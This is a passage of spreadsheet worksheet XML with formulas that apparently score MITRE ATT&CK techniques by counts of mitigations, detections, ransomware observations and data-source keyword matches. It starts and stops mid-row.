        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z257">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA257">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB257">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC257" s="29" t="s">
        <v>1093</v>
      </c>
      <c r="AD257" s="25" t="str" cm="1">
        <f t="array" ref="AD257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE257" s="25">
        <f>IF(AD257="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF257" s="25" t="str" cm="1">
        <f t="array" ref="AF257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG257" s="25">
        <f>IF(AF257="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH257" s="25" t="str" cm="1">
        <f t="array" ref="AH257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI257" s="25">
        <f>IF(AH257="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ257" s="25" t="str" cm="1">
        <f t="array" ref="AJ257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC257)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK257" s="25">
        <f>IF(AJ257="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL257" s="25" t="str" cm="1">
        <f t="array" ref="AL257">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC257)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM257" s="25">
        <f>IF(AL257="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN257" s="60">
        <v>2</v>
      </c>
      <c r="AO257" s="51">
        <v>1</v>
      </c>
      <c r="AP257" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1003247619047619</v>
      </c>
      <c r="AQ257" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AR257" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AS257" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT257" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU25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58" spans="1:47" ht="32.1">
      <c r="A258" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0700000000000013E-2</v>
      </c>
      <c r="B258" s="25">
        <f>SUM(H258,M258,V258)*(1+SUM(AE258,AG258,AI258,AK258,AM258))</f>
        <v>0.3736666666666667</v>
      </c>
      <c r="C258" s="25" t="s">
        <v>1094</v>
      </c>
      <c r="D258" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E258" s="25" t="s">
        <v>1095</v>
      </c>
      <c r="F258" s="51">
        <v>1</v>
      </c>
      <c r="G258" s="51">
        <v>1</v>
      </c>
      <c r="H258" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I258">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J258">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K258">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L258">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M258" s="25">
        <v>0</v>
      </c>
      <c r="N258" s="51">
        <v>0</v>
      </c>
      <c r="O258" s="51">
        <v>2</v>
      </c>
      <c r="P258" s="51">
        <v>0</v>
      </c>
      <c r="Q258" s="51">
        <v>0</v>
      </c>
      <c r="R258" s="52" t="s">
        <v>1096</v>
      </c>
      <c r="S258" s="51">
        <v>8</v>
      </c>
      <c r="T258" s="52" t="s">
        <v>1097</v>
      </c>
      <c r="U258" s="51">
        <v>10</v>
      </c>
      <c r="V258" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W258">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X258">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y258">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z258">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA258">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB258">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC258" s="29" t="s">
        <v>256</v>
      </c>
      <c r="AD258" s="25" t="str" cm="1">
        <f t="array" ref="AD258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC258)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE258" s="25">
        <f>IF(AD258="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF258" s="25" t="str" cm="1">
        <f t="array" ref="AF258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG258" s="25">
        <f>IF(AF258="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH258" s="25" t="str" cm="1">
        <f t="array" ref="AH258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC258)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI258" s="25">
        <f>IF(AH258="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ258" s="25" t="str" cm="1">
        <f t="array" ref="AJ258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK258" s="25">
        <f>IF(AJ258="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL258" s="25" t="str" cm="1">
        <f t="array" ref="AL258">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC258)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM258" s="25">
        <f>IF(AL258="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN258" s="60">
        <v>1</v>
      </c>
      <c r="AO258" s="51">
        <v>1</v>
      </c>
      <c r="AP258" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0700000000000013E-2</v>
      </c>
      <c r="AQ258" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AR258" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12455555555555557</v>
      </c>
      <c r="AS258" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT258" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU25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59" spans="1:47" ht="32.1">
      <c r="A259" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3658095238095237E-2</v>
      </c>
      <c r="B259" s="25">
        <f>SUM(H259,M259,V259)*(1+SUM(AE259,AG259,AI259,AK259,AM259))</f>
        <v>0.33658095238095237</v>
      </c>
      <c r="C259" s="25" t="s">
        <v>1098</v>
      </c>
      <c r="D259" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E259" s="25" t="s">
        <v>1099</v>
      </c>
      <c r="F259" s="51">
        <v>1</v>
      </c>
      <c r="G259" s="51">
        <v>1</v>
      </c>
      <c r="H259" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I259">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J259">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K259">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L259">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M259" s="25">
        <v>0</v>
      </c>
      <c r="N259" s="51">
        <v>0</v>
      </c>
      <c r="O259" s="51">
        <v>1</v>
      </c>
      <c r="P259" s="51">
        <v>1</v>
      </c>
      <c r="Q259" s="51">
        <v>0</v>
      </c>
      <c r="R259" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S259" s="51">
        <v>7</v>
      </c>
      <c r="T259" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U259" s="51">
        <v>11</v>
      </c>
      <c r="V259" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W259">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X259">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y259">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z259">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA259">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB259">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC259" s="29" t="s">
        <v>1100</v>
      </c>
      <c r="AD259" s="25" t="str" cm="1">
        <f t="array" ref="AD259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC259)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE259" s="25">
        <f>IF(AD259="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF259" s="25" t="str" cm="1">
        <f t="array" ref="AF259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC259)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG259" s="25">
        <f>IF(AF259="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH259" s="25" t="str" cm="1">
        <f t="array" ref="AH259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI259" s="25">
        <f>IF(AH259="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ259" s="25" t="str" cm="1">
        <f t="array" ref="AJ259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK259" s="25">
        <f>IF(AJ259="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL259" s="25" t="str" cm="1">
        <f t="array" ref="AL259">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC259)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM259" s="25">
        <f>IF(AL259="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN259" s="60">
        <v>0</v>
      </c>
      <c r="AO259" s="51">
        <v>0</v>
      </c>
      <c r="AP259" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3658095238095237E-2</v>
      </c>
      <c r="AQ259" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AR259" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AS259" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT259" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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60" spans="1:47" ht="32.1">
      <c r="A260" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0066666666666666E-2</v>
      </c>
      <c r="B260" s="25">
        <f>SUM(H260,M260,V260)*(1+SUM(AE260,AG260,AI260,AK260,AM260))</f>
        <v>0.3673333333333334</v>
      </c>
      <c r="C260" s="25" t="s">
        <v>1101</v>
      </c>
      <c r="D260" s="25" t="s">
        <v>353</v>
      </c>
      <c r="E260" s="25" t="s">
        <v>1102</v>
      </c>
      <c r="F260" s="51">
        <v>1</v>
      </c>
      <c r="G260" s="51">
        <v>1</v>
      </c>
      <c r="H260" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I260">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J260">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K260">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L260">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M260" s="25">
        <v>0</v>
      </c>
      <c r="N260" s="51">
        <v>0</v>
      </c>
      <c r="O260" s="51">
        <v>1</v>
      </c>
      <c r="P260" s="51">
        <v>0</v>
      </c>
      <c r="Q260" s="51">
        <v>4</v>
      </c>
      <c r="R260" s="52" t="s">
        <v>1103</v>
      </c>
      <c r="S260" s="51">
        <v>2</v>
      </c>
      <c r="T260" s="51" t="s">
        <v>1104</v>
      </c>
      <c r="U260" s="51">
        <v>14</v>
      </c>
      <c r="V260" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W260">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X260">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y260">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z260">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA260">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB260">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC260" s="29" t="s">
        <v>1105</v>
      </c>
      <c r="AD260" s="25" t="str" cm="1">
        <f t="array" ref="AD260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC260)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE260" s="25">
        <f>IF(AD260="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF260" s="25" t="str" cm="1">
        <f t="array" ref="AF260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG260" s="25">
        <f>IF(AF260="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH260" s="25" t="str" cm="1">
        <f t="array" ref="AH260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC260)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI260" s="25">
        <f>IF(AH260="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ260" s="25" t="str" cm="1">
        <f t="array" ref="AJ260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK260" s="25">
        <f>IF(AJ260="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL260" s="25" t="str" cm="1">
        <f t="array" ref="AL260">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC260)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM260" s="25">
        <f>IF(AL260="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN260" s="60">
        <v>1</v>
      </c>
      <c r="AO260" s="51">
        <v>1</v>
      </c>
      <c r="AP260" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0066666666666666E-2</v>
      </c>
      <c r="AQ260" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AR260" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AS260" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT260" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU26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61" spans="1:47" ht="32.1">
      <c r="A261" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0066666666666666E-2</v>
      </c>
      <c r="B261" s="25">
        <f>SUM(H261,M261,V261)*(1+SUM(AE261,AG261,AI261,AK261,AM261))</f>
        <v>0.3673333333333334</v>
      </c>
      <c r="C261" s="25" t="s">
        <v>1106</v>
      </c>
      <c r="D261" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E261" s="25" t="s">
        <v>1107</v>
      </c>
      <c r="F261" s="51">
        <v>1</v>
      </c>
      <c r="G261" s="51">
        <v>1</v>
      </c>
      <c r="H261" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I261">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J261">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K261">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L261">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M261" s="25">
        <v>0</v>
      </c>
      <c r="N261" s="51">
        <v>0</v>
      </c>
      <c r="O261" s="51">
        <v>1</v>
      </c>
      <c r="P261" s="51">
        <v>0</v>
      </c>
      <c r="Q261" s="51">
        <v>0</v>
      </c>
      <c r="R261" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S261" s="51">
        <v>7</v>
      </c>
      <c r="T261" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U261" s="51">
        <v>11</v>
      </c>
      <c r="V261" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W261">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X261">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y261">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z261">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA261">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB261">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC261" s="29" t="s">
        <v>1108</v>
      </c>
      <c r="AD261" s="25" t="str" cm="1">
        <f t="array" ref="AD261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC261)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE261" s="25">
        <f>IF(AD261="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF261" s="25" t="str" cm="1">
        <f t="array" ref="AF261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG261" s="25">
        <f>IF(AF261="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH261" s="25" t="str" cm="1">
        <f t="array" ref="AH261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC261)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI261" s="25">
        <f>IF(AH261="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
